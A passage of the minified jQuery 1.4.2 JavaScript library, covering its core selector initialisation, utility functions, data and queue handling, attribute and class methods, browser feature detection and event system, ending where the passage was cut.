/*
 * jQuery JavaScript Library v1.4.2
 * http://jquery.com/
 *
 * Copyright 2010, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2010, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Sat Feb 13 22:33:48 2010 -0500
 */
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o],o,e(a[o],b)):d,j);return a}return i?e(a[0],b):w}function J(){return(new Date).getTime()}function Y(){return false}function Z(){return true}function na(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function oa(a){var b,d=[],f=[],e=arguments,j,i,o,k,n,r;i=c.data(this,"events");if(!(a.liveFired===this||!i||!i.live||a.button&&a.type==="click")){a.liveFired=this;var u=i.live.slice(0);for(k=0;k<u.length;k++){i=u[k];i.origType.replace(O,"")===a.type?f.push(i.selector):u.splice(k--,1)}j=c(a.target).closest(f,a.currentTarget);n=0;for(r=j.length;n<r;n++)for(k=0;k<u.length;k++){i=u[k];if(j[n].selector===i.selector){o=j[n].elem;f=null;if(i.preType==="mouseenter"||i.preType==="mouseleave")f=c(a.relatedTarget).closest(i.selector)[0];if(!f||f!==o)d.push({elem:o,handleObj:i})}}n=0;for(r=d.length;n<r;n++){j=d[n];a.currentTarget=j.elem;a.data=j.handleObj.data;a.handleObj=j.handleObj;if(j.handleObj.origHandler.apply(j.elem,e)===false){b=false;break}}return b}}function pa(a,b){return"live."+(a&&a!=="*"?a+".":"")+b.replace(/\./g,"`").replace(/ /g,"&")}function qa(a){return!a||!a.parentNode||a.parentNode.nodeType===11}function ra(a,b){var d=0;b.each(function(){if(this.nodeName===(a[d]&&a[d].nodeName)){var f=c.data(a[d++]),e=c.data(this,f);if(f=f&&f.events){delete e.handle;e.events={};for(var j in f)for(var i in f[j])c.event.add(this,j,f[j][i],f[j][i].data)}}})}function sa(a,b,d){var f,e,j;b=b&&b[0]?b[0].ownerDocument||b[0]:s;if(a.length===1&&typeof a[0]==="string"&&a[0].length<512&&b===s&&!ta.test(a[0])&&(c.support.checkClone||!ua.test(a[0]))){e=true;if(j=c.fragments[a[0]])if(j!==1)f=j}if(!f){f=b.createDocumentFragment();c.clean(a,b,f,d)}if(e)c.fragments[a[0]]=j?f:1;return{fragment:f,cacheable:e}}function K(a,b){var d={};c.each(va.concat.apply([],va.slice(0,b)),function(){d[this]=a});return d}function wa(a){return"scrollTo"in a&&a.document?a:a.nodeType===9?a.defaultView||a.parentWindow:false}var c=function(a,b){return new c.fn.init(a,b)},Ra=A.jQuery,Sa=A.$,s=A.document,T,Ta=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,Ua=/^.[^:#\[\.,]*$/,Va=/\S/,Wa=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,Xa=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,P=navigator.userAgent,xa=false,Q=[],L,$=Object.prototype.toString,aa=Object.prototype.hasOwnProperty,ba=Array.prototype.push,R=Array.prototype.slice,ya=Array.prototype.indexOf;c.fn=c.prototype={init:function(a,b){var d,f;if(!a)return this;if(a.nodeType){this.context=this[0]=a;this.length=1;return this}if(a==="body"&&!b){this.context=s;this[0]=s.body;this.selector="body";this.length=1;return this}if(typeof a==="string")if((d=Ta.exec(a))&&(d[1]||!b))if(d[1]){f=b?b.ownerDocument||b:s;if(a=Xa.exec(a))if(c.isPlainObject(b)){a=[s.createElement(a[1])];c.fn.attr.call(a,b,true)}else a=[f.createElement(a[1])];else{a=sa([d[1]],[f]);a=(a.cacheable?a.fragment.cloneNode(true):a.fragment).childNodes}return c.merge(this,a)}else{if(b=s.getElementById(d[2])){if(b.id!==d[2])return T.find(a);this.length=1;this[0]=b}this.context=s;this.selector=a;return this}else if(!b&&/^\w+$/.test(a)){this.selector=a;this.context=s;a=s.getElementsByTagName(a);return c.merge(this,a)}else return!b||b.jquery?(b||T).find(a):c(b).find(a);else if(c.isFunction(a))return T.ready(a);if(a.selector!==w){this.selector=a.selector;this.context=a.context}return c.makeArray(a,this)},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length},toArray:function(){return R.call(this,0)},get:function(a){return a==null?this.toArray():a<0?this.slice(a)[0]:this[a]},pushStack:function(a,b,d){var f=c();c.isArray(a)?ba.apply(f,a):c.merge(f,a);f.prevObject=this;f.context=this.context;if(b==="find")f.selector=this.selector+(this.selector?" ":"")+d;else if(b)f.selector=this.selector+"."+b+"("+d+")";return f},each:function(a,b){return c.each(this,a,b)},ready:function(a){c.bindReady();if(c.isReady)a.call(s,c);else Q&&Q.push(a);return this},eq:function(a){return a===-1?this.slice(a):this.slice(a,+a+1)},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},slice:function(){return this.pushStack(R.apply(this,arguments),"slice",R.call(arguments).join(","))},map:function(a){return this.pushStack(c.map(this,function(b,d){return a.call(b,d,b)}))},end:function(){return this.prevObject||c(null)},push:ba,sort:[].sort,splice:[].splice};c.fn.init.prototype=c.fn;c.extend=c.fn.extend=function(){var a=arguments[0]||{},b=1,d=arguments.length,f=false,e,j,i,o;if(typeof a==="boolean"){f=a;a=arguments[1]||{};b=2}if(typeof a!=="object"&&!c.isFunction(a))a={};if(d===b){a=this;--b}for(;b<d;b++)if((e=arguments[b])!=null)for(j in e){i=a[j];o=e[j];if(a!==o)if(f&&o&&(c.isPlainObject(o)||c.isArray(o))){i=i&&(c.isPlainObject(i)||c.isArray(i))?i:c.isArray(o)?[]:{};a[j]=c.extend(f,i,o)}else if(o!==w)a[j]=o}return a};c.extend({noConflict:function(a){A.$=Sa;if(a)A.jQuery=Ra;return c},isReady:false,ready:function(){if(!c.isReady){if(!s.body)return setTimeout(c.ready,13);c.isReady=true;if(Q){for(var a,b=0;a=Q[b++];)a.call(s,c);Q=null}c.fn.triggerHandler&&c(s).triggerHandler("ready")}},bindReady:function(){if(!xa){xa=true;if(s.readyState==="complete")return c.ready();if(s.addEventListener){s.addEventListener("DOMContentLoaded",L,false);A.addEventListener("load",c.ready,false)}else if(s.attachEvent){s.attachEvent("onreadystatechange",L);A.attachEvent("onload",c.ready);var a=false;try{a=A.frameElement==null}catch(b){}s.documentElement.doScroll&&a&&ma()}}},isFunction:function(a){return $.call(a)==="[object Function]"},isArray:function(a){return $.call(a)==="[object Array]"},isPlainObject:function(a){if(!a||$.call(a)!=="[object Object]"||a.nodeType||a.setInterval)return false;if(a.constructor&&!aa.call(a,"constructor")&&!aa.call(a.constructor.prototype,"isPrototypeOf"))return false;var b;for(b in a);return b===w||aa.call(a,b)},isEmptyObject:function(a){for(var b in a)return false;return true},error:function(a){throw a;},parseJSON:function(a){if(typeof a!=="string"||!a)return null;a=c.trim(a);if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,"")))return A.JSON&&A.JSON.parse?A.JSON.parse(a):(new Function("return "+
a))();else c.error("Invalid JSON: "+a)},noop:function(){},globalEval:function(a){if(a&&Va.test(a)){var b=s.getElementsByTagName("head")[0]||s.documentElement,d=s.createElement("script");d.type="text/javascript";if(c.support.scriptEval)d.appendChild(s.createTextNode(a));else d.text=a;b.insertBefore(d,b.firstChild);b.removeChild(d)}},nodeName:function(a,b){return a.nodeName&&a.nodeName.toUpperCase()===b.toUpperCase()},each:function(a,b,d){var f,e=0,j=a.length,i=j===w||c.isFunction(a);if(d)if(i)for(f in a){if(b.apply(a[f],d)===false)break}else for(;e<j;){if(b.apply(a[e++],d)===false)break}else if(i)for(f in a){if(b.call(a[f],f,a[f])===false)break}else for(d=a[0];e<j&&b.call(d,e,d)!==false;d=a[++e]);return a},trim:function(a){return(a||"").replace(Wa,"")},makeArray:function(a,b){b=b||[];if(a!=null)a.length==null||typeof a==="string"||c.isFunction(a)||typeof a!=="function"&&a.setInterval?ba.call(b,a):c.merge(b,a);return b},inArray:function(a,b){if(b.indexOf)return b.indexOf(a);for(var d=0,f=b.length;d<f;d++)if(b[d]===a)return d;return-1},merge:function(a,b){var d=a.length,f=0;if(typeof b.length==="number")for(var e=b.length;f<e;f++)a[d++]=b[f];else for(;b[f]!==w;)a[d++]=b[f++];a.length=d;return a},grep:function(a,b,d){for(var f=[],e=0,j=a.length;e<j;e++)!d!==!b(a[e],e)&&f.push(a[e]);return f},map:function(a,b,d){for(var f=[],e,j=0,i=a.length;j<i;j++){e=b(a[j],j,d);if(e!=null)f[f.length]=e}return f.concat.apply([],f)},guid:1,proxy:function(a,b,d){if(arguments.length===2)if(typeof b==="string"){d=a;a=d[b];b=w}else if(b&&!c.isFunction(b)){d=b;b=w}if(!b&&a)b=function(){return a.apply(d||this,arguments)};if(a)b.guid=a.guid=a.guid||b.guid||c.guid++;return b},uaMatch:function(a){a=a.toLowerCase();a=/(webkit)[ \/]([\w.]+)/.exec(a)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(a)||/(msie) ([\w.]+)/.exec(a)||!/compatible/.test(a)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(a)||[];return{browser:a[1]||"",version:a[2]||"0"}},browser:{}});P=c.uaMatch(P);if(P.browser){c.browser[P.browser]=true;c.browser.version=P.version}if(c.browser.webkit)c.browser.safari=true;if(ya)c.inArray=function(a,b){return ya.call(b,a)};T=c(s);if(s.addEventListener)L=function(){s.removeEventListener("DOMContentLoaded",L,false);c.ready()};else if(s.attachEvent)L=function(){if(s.readyState==="complete"){s.detachEvent("onreadystatechange",L);c.ready()}};(function(){c.support={};var a=s.documentElement,b=s.createElement("script"),d=s.createElement("div"),f="script"+J();d.style.display="none";d.innerHTML="   <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var e=d.getElementsByTagName("*"),j=d.getElementsByTagName("a")[0];if(!(!e||!e.length||!j)){c.support={leadingWhitespace:d.firstChild.nodeType===3,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/red/.test(j.getAttribute("style")),hrefNormalized:j.getAttribute("href")==="/a",opacity:/^0.55$/.test(j.style.opacity),cssFloat:!!j.style.cssFloat,checkOn:d.getElementsByTagName("input")[0].value==="on",optSelected:s.createElement("select").appendChild(s.createElement("option")).selected,parentNode:d.removeChild(d.appendChild(s.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};b.type="text/javascript";try{b.appendChild(s.createTextNode("window."+f+"=1;"))}catch(i){}a.insertBefore(b,a.firstChild);if(A[f]){c.support.scriptEval=true;delete A[f]}try{delete b.test}catch(o){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function k(){c.support.noCloneEvent=false;d.detachEvent("onclick",k)});d.cloneNode(true).fireEvent("onclick")}d=s.createElement("div");d.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";a=s.createDocumentFragment();a.appendChild(d.firstChild);c.support.checkClone=a.cloneNode(true).cloneNode(true).lastChild.checked;c(function(){var k=s.createElement("div");k.style.width=k.style.paddingLeft="1px";s.body.appendChild(k);c.boxModel=c.support.boxModel=k.offsetWidth===2;s.body.removeChild(k).style.display="none"});a=function(k){var n=s.createElement("div");k="on"+k;var r=k in n;if(!r){n.setAttribute(k,"return;");r=typeof n[k]==="function"}return r};c.support.submitBubbles=a("submit");c.support.changeBubbles=a("change");a=b=d=e=j=null}})();c.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var G="jQuery"+J(),Ya=0,za={};c.extend({cache:{},expando:G,noData:{embed:true,object:true,applet:true},data:function(a,b,d){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var f=a[G],e=c.cache;if(!f&&typeof b==="string"&&d===w)return null;f||(f=++Ya);if(typeof b==="object"){a[G]=f;e[f]=c.extend(true,{},b)}else if(!e[f]){a[G]=f;e[f]={}}a=e[f];if(d!==w)a[b]=d;return typeof b==="string"?a[b]:a}},removeData:function(a,b){if(!(a.nodeName&&c.noData[a.nodeName.toLowerCase()])){a=a==A?za:a;var d=a[G],f=c.cache,e=f[d];if(b){if(e){delete e[b];c.isEmptyObject(e)&&c.removeData(a)}}else{if(c.support.deleteExpando)delete a[c.expando];else a.removeAttribute&&a.removeAttribute(c.expando);delete f[d]}}}});c.fn.extend({data:function(a,b){if(typeof a==="undefined"&&this.length)return c.data(this[0]);else if(typeof a==="object")return this.each(function(){c.data(this,a)});var d=a.split(".");d[1]=d[1]?"."+d[1]:"";if(b===w){var f=this.triggerHandler("getData"+d[1]+"!",[d[0]]);if(f===w&&this.length)f=c.data(this[0],a);return f===w&&d[1]?this.data(d[0]):f}else return this.trigger("setData"+d[1]+"!",[d[0],b]).each(function(){c.data(this,a,b)})},removeData:function(a){return this.each(function(){c.removeData(this,a)})}});c.extend({queue:function(a,b,d){if(a){b=(b||"fx")+"queue";var f=c.data(a,b);if(!d)return f||[];if(!f||c.isArray(d))f=c.data(a,b,c.makeArray(d));else f.push(d);return f}},dequeue:function(a,b){b=b||"fx";var d=c.queue(a,b),f=d.shift();if(f==="inprogress")f=d.shift();if(f){b==="fx"&&d.unshift("inprogress");f.call(a,function(){c.dequeue(a,b)})}}});c.fn.extend({queue:function(a,b){if(typeof a!=="string"){b=a;a="fx"}if(b===w)return c.queue(this[0],a);return this.each(function(){var d=c.queue(this,a,b);a==="fx"&&d[0]!=="inprogress"&&c.dequeue(this,a)})},dequeue:function(a){return this.each(function(){c.dequeue(this,a)})},delay:function(a,b){a=c.fx?c.fx.speeds[a]||a:a;b=b||"fx";return this.queue(b,function(){var d=this;setTimeout(function(){c.dequeue(d,b)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var Aa=/[\n\t]/g,ca=/\s+/,Za=/\r/g,$a=/href|src|style/,ab=/(button|input)/i,bb=/(button|input|object|select|textarea)/i,cb=/^(a|area)$/i,Ba=/radio|checkbox/;c.fn.extend({attr:function(a,b){return X(this,a,b,true,c.attr)},removeAttr:function(a){return this.each(function(){c.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(c.isFunction(a))return this.each(function(n){var r=c(this);r.addClass(a.call(this,n,r.attr("class")))});if(a&&typeof a==="string")for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1)if(e.className){for(var j=" "+e.className+" ",i=e.className,o=0,k=b.length;o<k;o++)if(j.indexOf(" "+b[o]+" ")<0)i+=" "+b[o];e.className=c.trim(i)}else e.className=a}return this},removeClass:function(a){if(c.isFunction(a))return this.each(function(k){var n=c(this);n.removeClass(a.call(this,k,n.attr("class")))});if(a&&typeof a==="string"||a===w)for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var j=(" "+e.className+" ").replace(Aa," "),i=0,o=b.length;i<o;i++)j=j.replace(" "+b[i]+" "," ");e.className=c.trim(j)}else e.className=""}return this},toggleClass:function(a,b){var d=typeof a,f=typeof b==="boolean";if(c.isFunction(a))return this.each(function(e){var j=c(this);j.toggleClass(a.call(this,e,j.attr("class"),b),b)});return this.each(function(){if(d==="string")for(var e,j=0,i=c(this),o=b,k=a.split(ca);e=k[j++];){o=f?o:!i.hasClass(e);i[o?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&c.data(this,"__className__",this.className);this.className=this.className||a===false?"":c.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var b=0,d=this.length;b<d;b++)if((" "+this[b].className+" ").replace(Aa," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===w){var b=this[0];if(b){if(c.nodeName(b,"option"))return(b.attributes.value||{}).specified?b.value:b.text;if(c.nodeName(b,"select")){var d=b.selectedIndex,f=[],e=b.options;b=b.type==="select-one";if(d<0)return null;var j=b?d:0;for(d=b?d+1:e.length;j<d;j++){var i=e[j];if(i.selected){a=c(i).val();if(b)return a;f.push(a)}}return f}if(Ba.test(b.type)&&!c.support.checkOn)return b.getAttribute("value")===null?"on":b.value;return(b.value||"").replace(Za,"")}return w}var o=c.isFunction(a);return this.each(function(k){var n=c(this),r=a;if(this.nodeType===1){if(o)r=a.call(this,k,n.val());if(typeof r==="number")r+="";if(c.isArray(r)&&Ba.test(this.type))this.checked=c.inArray(n.val(),r)>=0;else if(c.nodeName(this,"select")){var u=c.makeArray(r);c("option",this).each(function(){this.selected=c.inArray(c(this).val(),u)>=0});if(!u.length)this.selectedIndex=-1}else this.value=r}})}});c.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,b,d,f){if(!a||a.nodeType===3||a.nodeType===8)return w;if(f&&b in c.attrFn)return c(a)[b](d);f=a.nodeType!==1||!c.isXMLDoc(a);var e=d!==w;b=f&&c.props[b]||b;if(a.nodeType===1){var j=$a.test(b);if(b in a&&f&&!j){if(e){b==="type"&&ab.test(a.nodeName)&&a.parentNode&&c.error("type property can't be changed");a[b]=d}if(c.nodeName(a,"form")&&a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b==="tabIndex")return(b=a.getAttributeNode("tabIndex"))&&b.specified?b.value:bb.test(a.nodeName)||cb.test(a.nodeName)&&a.href?0:w;return a[b]}if(!c.support.style&&f&&b==="style"){if(e)a.style.cssText=""+d;return a.style.cssText}e&&a.setAttribute(b,""+d);a=!c.support.hrefNormalized&&f&&j?a.getAttribute(b,2):a.getAttribute(b);return a===null?w:a}return c.style(a,b,d)}});var O=/\.(.*)$/,db=function(a){return a.replace(/[^\w\s\.\|`]/g,function(b){return"\\"+b})};c.event={add:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==A&&!a.frameElement)a=A;var e,j;if(d.handler){e=d;d=e.handler}if(!d.guid)d.guid=c.guid++;if(j=c.data(a)){var i=j.events=j.events||{},o=j.handle;if(!o)j.handle=o=function(){return typeof c!=="undefined"&&!c.event.triggered?c.event.handle.apply(o.elem,arguments):w};o.elem=a;b=b.split(" ");for(var k,n=0,r;k=b[n++];){j=e?c.extend({},e):{handler:d,data:f};if(k.indexOf(".")>-1){r=k.split(".");k=r.shift();j.namespace=r.slice(0).sort().join(".")}else{r=[];j.namespace=""}j.type=k;j.guid=d.guid;var u=i[k],z=c.event.special[k]||{};if(!u){u=i[k]=[];if(!z.setup||z.setup.call(a,f,r,o)===false)if(a.addEventListener)a.addEventListener(k,o,false);else a.attachEvent&&a.attachEvent("on"+k,o)}if(z.add){z.add.call(a,j);if(!j.handler.guid)j.handler.guid=d.guid}u.push(j);c.event.global[k]=true}a=null}}},global:{},remove:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){var e,j=0,i,o,k,n,r,u,z=c.data(a),C=z&&z.events;if(z&&C){if(b&&b.type){d=b.handler;b=b.type}if(!b||typeof b==="string"&&b.charAt(0)==="."){b=b||"";for(e in C)c.event.remove(a,e+b)}else{for(b=b.split(" ");e=b[j++];){n=e;i=e.indexOf(".")<0;o=[];if(!i){o=e.split(".");e=o.shift();k=new RegExp("(^|\\.)"+c.map(o.slice(0).sort(),db).join("\\.(?:.*\\.)?")+"(\\.|$)")}if(r=C[e])if(d){n=c.event.special[e]||{};for(B=f||0;B<r.length;B++){u=r[B];if(d.guid===u.guid){if(i||k.test(u.namespace)){f==null&&r.splice(B--,1);n.remove&&n.remove.call(a,u)}if(f!=null)break}}if(r.length===0||f!=null&&r.length===1){if(!n.teardown||n.teardown.call(a,o)===false)Ca(a,e,z.handle);delete C[e]}}else for(var B=0;B<r.length;B++){u=r[B];if(i||k.test(u.namespace)){c.event.remove(a,n,u.handler,B);r.splice(B--,1)}}}if(c.isEmptyObject(C)){if(b=z.handle)b.elem=null;delete z.events;delete z.handle;c.isEmptyObject(z)&&c.removeData(a)}}}}},trigger:function(a,b,d,f){var e=a.type||a;if(!f){a=typeof a==="object"?a[G]?a:c.extend(c.Event(e),a):c.Event(e);if(e.indexOf("!")>=0){a.type=e=e.slice(0,-1);a.exclusive=true}if(!d){a.stopPropagation();c.event.global[e]&&c.each(c.cache,function(){this.events&&this.events[e]&&c.event.trigger(a,b,this.handle.elem)})}if(!d||d.nodeType===3||d.nodeType===8)return w;a.result=w;a.target=d;b=c.makeArray(b);b.unshift(a)}a.currentTarget=d;(f=c.data(d,"handle"))&&f.apply(d,b);f=d.parentNode||d.ownerDocument;try{if(!(d&&d.nodeName&&c.noData[d.nodeName.toLowerCase()]))if(d["on"+e]&&d["on"+e].apply(d,b)===false)a.result=false}catch(j){}if(!a.isPropagationStopped()&&f)c.event.trigger(a,b,f,true);else if(!a.isDefaultPrevented()){f=a.target;var i,o=c.nodeName(f,"a")&&e==="click",k=c.event.special[e]||{};if((!k._default||k._default.call(d,a)===false)&&!o&&!(f&&f.nodeName&&c.noData[f.nodeName.toLowerCase()])){try{if(f[e]){if(i=f["on"+e])f["on"+e]=null;c.event.triggered=true;f[e]()}}catch(n){}if(i)f["on"+e]=i;c.event.triggered=false}}},handle:function(a){var b,d,f,e;a=arguments[0]=c.event.fix(a||A.event);a.currentTarget=this;b=a.type.indexOf(".")<0&&!a.exclusive;if(!b){d=a.type.split(".");a.type=d.shift();f=new RegExp("(^|\\.)"+d.slice(0).sort().join("\\.(?:.*\\.)?")+"(\\.|$)")}e=c.data(this,"events");d=e[a.type];if(e&&d){d=d.slice(0);e=0;for(var j=d.length;e<j;e++){var i=d[e];if(b||f.test(i.namespace)){a.handler=i.handler;a.data=i.data;a.handleObj=i;i=i.handler.apply(this,arguments);if(i!==w){a.result=i;if(i===false){a.preventDefault();a.stopPropagation()}}if(a.isImmediatePropagationStopped())break}}}return a.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),fix:function(a){if(a[G])return a;var b=a;a=c.Event(b);for(var d=this.props.length,f;d;){f=this.props[--d];a[f]=b[f]}if(!a.target)a.target=a.srcElement||s;if(a.target.nodeType===3)a.target=a.target.parentNode;if(!a.relatedTarget&&a.fromElement)a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement;if(a.pageX==null&&a.clientX!=null){b=s.documentElement;d=s.body;a.pageX=a.clientX+(b&&b.scrollLeft||d&&d.scrollLeft||0)-(b&&b.clientLeft||d&&d.clientLeft||0);a.pageY=a.clientY+(b&&b.scrollTop||d&&d.scrollTop||0)-(b&&b.clientTop||d&&d.clientTop||0)}if(!a.which&&(a.charCode||a.charCode===0?a.charCode:a.keyCode))a.which=a.charCode||a.keyCode;if(!a.metaKey&&a.ctrlKey)a.metaKey=a.ctrlKey;if(!a.which&&a.button!==w)a.which=a.button&1?1:a.button&2?3:a.button&4?2:0;return a},guid:1E8,proxy:c.proxy,special:{ready:{setup:c.bindReady,teardown:c.noop},live:{add:function(a){c.event.add(this,a.origType,c.extend({},a,{handler:oa}))},remove:function(a){var b=true,d=a.origType.replace(O,"");c.each(c.data(this,"events").live||[],function(){if(d===this.origType.replace(O,""))return b=false});b&&c.event.remove(this,a.origType,oa)}},beforeunload:{setup:function(a,b,d){if(this.setInterval)this.onbeforeunload=d;return false},teardown:function(a,b){if(this.onbeforeunload===b)this.onbeforeunload=null}}}};var Ca=s.removeEventListener?function(a,b,d){a.removeEventListener(b,d,false)}:function(a,b,d){a.detachEvent("on"+b,d)};c.Event=function(a){if(!this.preventDefault)return new c.Event(a);if(a&&a.type){this.originalEvent=a;this.type=a.type}else this.type=a;this.timeStamp=J();this[G]=true};c.Event.prototype={preventDefault:function(){this.isDefaultPrevented=Z;var a=this.originalEvent;if(a){a.preventDefault&&a.preventDefault();a.returnValue=false}},stopPropagation:function(){this.isPropagationStopped=Z;var a=this.originalEvent;if(a){a.stopPropagation&&a.stopPropagation();a.cancelBubble=true}},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=Z;this.stopPropagation()},isDefaultPrevented:Y,isPropagationStopped:Y,isImmediatePropagationStopped:Y};var Da=function(a){var b=a.relatedTarget;try{for(;b&&b!==this;)b=b.parentNode;if(b!==this){a.type=a.data;c.event.handle.apply(this,arguments)}}catch(d){}},Ea=function(a){a.type=a.data;c.event.handle.apply(this,arguments)};c.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){c.event.special[a]={setup:function(d){c.event.add(this,b,d&&d.selector?Ea:Da,a)},teardown:function(d){c.event.remove(this,b,d&&d.selector?Ea:Da)}}});if(!c.support.submitBubbles)c.event.special.submit={setup:function(){if(this.nodeName.toLowerCase()!=="form"){c.event.add(this,"click.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="submit"||d==="image")&&c(b).closest("form").length)return na("submit",this,arguments)});c.event.add(this,"keypress.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="text"||d==="password")&&c(b).closest("form").length&&a.keyCode===13)return na("submit",this,arguments)})}else return false},teardown:function(){c.event.remove(this,".specialSubmit")}};if(!c.support.changeBubbles){var da=/textarea|input|select/i,ea,Fa=function(a){var b=a.type,d=a.value;if(b==="radio"||b==="checkbox")d=a.checked;else if(b==="select-multiple")d=a.selectedIndex>-1?c.map(a.options,function(f){return f.selected}).join("-"):"";else if(a.nodeName.toLowerCase()==="select")d=a.selectedIndex;return d},fa=function(a,b){var d=a.target,f,e;if(!(!da.test(d.nodeName)||d.readOnly)){f=c.data(d,"_change_data");e=Fa(d);if(a.type!=="focusout"||d.type!=="radio")c.data(d,"_change_data",e);if(!(f===w||e===f))if(f!=null||e){a.type="change";return c.event.trigger(a,b,d)}}};c.event.special.change={filters:{focusout:fa,click:function(a){var b=a.target,d=b.type;if(d==="radio"||d==="checkbox"||b.nodeName.toLowerCase()==="select")return fa.call(this,a)},keydown:function(a){var b=a.target,d=b.type;if(a.keyCode===13&&b.nodeName.toLowerCase()!=="textarea"||a.keyCode===32&&(d==="checkbox"||d==="radio")||d==="select-multiple")return fa.call(this,a)},beforeactivate:function(a){a=a.target;c.data(a,"_change_data",Fa(a))}},setup:function(){if(this.type==="file")return false;for(var a in ea)c.event.add(this,a+".specialChange",ea[a]);return da.test(this.nodeName)},teardown:function(){c.event.remove(this,".specialChange");return da.test(this.nodeName)}};ea=c.event.special.change.filters}s.addEventListener&&c.each({focus:"focusin",blur:"focusout"},function(a,b){function d(f){f=c.event.fix(f);f.type=b;return c.event.handle.call(this,f)}c.event.special[b]={setup:function(){this.addEventListener(a,d,true)},teardown:function(){this.removeEventListener(a,d,true)}}});c.each(["bind","one"],function(a,b){c.fn[b]=function(d,f,e){if(typeof d==="object"){for(var j in d)this[b](j,f,d[j],e);return this}if(c.isFunction(f)){e=f;f=w}var i=b==="one"?c.proxy(e,function(k){c(this).unbind(k,i);return e.apply(this,arguments)}):e;if(d==="unload"&&b!=="one")this.one(d,f,e);else{j=0;for(var o=this.length;j<o;j++)c.event.add(this[j],d,i,f)}return this}});c.fn.extend({unbind:function(a,b){if(typeof a==="object"&&!a.preventDefault)for(var d in a)this.unbind(d,a[d]);else{d=0;for(var f=this.length;d<f;d++)c.event.remove(this[d],a,b)}return this},delegate:function(a,b,d,f){return this.live(b,d,f,a)},undelegate:function(a,b,d){return arguments.length===0?this.unbind("live"):this.die(b,null,d,a)},trigger:function(a,b){return this.each(function(){c.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0]){a=c.Event(a);a.preventDefault();a.stopPropagation();c.event.trigger(a,b,this[0]);return a.result}},toggle:function(a){for(var b=arguments,d=1;d<b.length;)c.proxy(a,b[d++]);return this.click(c.proxy(a,function(f){var e=(c.data(this,"lastToggle"+a.guid)||0)%d;c.data(this,"lastToggle"+a.guid,e+1);f.preventDefault();return b[e].apply(this,arguments)||false}))},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}});var Ga={focus:"focusin",blur:"focusout",mouseenter:"mouseover",mouseleave:"mouseout"};c.each(["live","die"],function(a,b){c.fn[b]=function(d,f,e,j){var i,o=0,k,n,r=j||this.selector,u=j?this:c(this.context);if(c.isFunction(f)){e=f;f=w}for(d=(d||"").split(" ");(i=d[o++])!=null;){j=O.exec(i);k="";if(j){k=j[0];i=i.replace(O,"")}if(i==="hover")d.push("mouseenter"+k,"mouseleave"+k);else{n=i;if(i==="focus"||i==="blur"){d.push(Ga[i]+k);i+=k}else i=(Ga[i]||i)+k;b==="live"?u.each(function(){c.event.add(this,pa(i,r),{data:f,selector:r,handler:e,origType:i,origHandler:e,preType:n})}):u.unbind(pa(i,r),e)}}return this}});c.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error".split(" "),function(a,b){c.fn[b]=function(d){return 